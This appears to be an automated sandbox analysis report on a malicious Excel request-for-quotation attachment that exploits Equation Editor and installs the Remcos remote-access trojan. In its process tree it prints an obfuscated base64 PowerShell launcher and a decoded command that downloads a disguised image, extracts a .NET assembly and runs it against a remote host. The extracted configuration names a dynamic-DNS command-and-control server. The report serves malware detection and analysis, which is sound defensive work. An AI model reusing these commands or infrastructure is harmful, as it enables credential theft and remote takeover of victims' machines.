

Windows Analysis Report
RFQ No. 109078906v.xla.xlsx

Overview

General Information

Sample name: RFQ No. 109078906v.xla.xlsx
Analysis ID: 1500264
MD5: 7d6c11d30d7322951af23907572b81ea
SHA1: e48456f2059d8eeaf2b9a2788cbe53b160dbfc3c
SHA256: 7d919f1cc55ce5ee6cdd40968757296e07038d7cb676205d77bacff65baa672a
Tags: xlaxlsx

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3368 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3672 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3972 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 4056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? 
? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? 
? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? 
? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? 
? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBS? ? ? ? ?FI? ? ? ? ?VgBF? ? ? ? ?C8? ? ? ? ?YwBi? ? ? ? ?G4? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?x? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?x? ? ? ? ?DM? ? ? ? ?Lg? ? ? ? ?y? ? ? ? ?Dc? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 2780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2544 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1e88:$obj2: \objdata
  • 0x1e72:$obj3: \objupdate

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1e88:$obj2: \objdata
  • 0x1e72:$obj3: \objupdate
Source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_UACBypassusingCMSTP
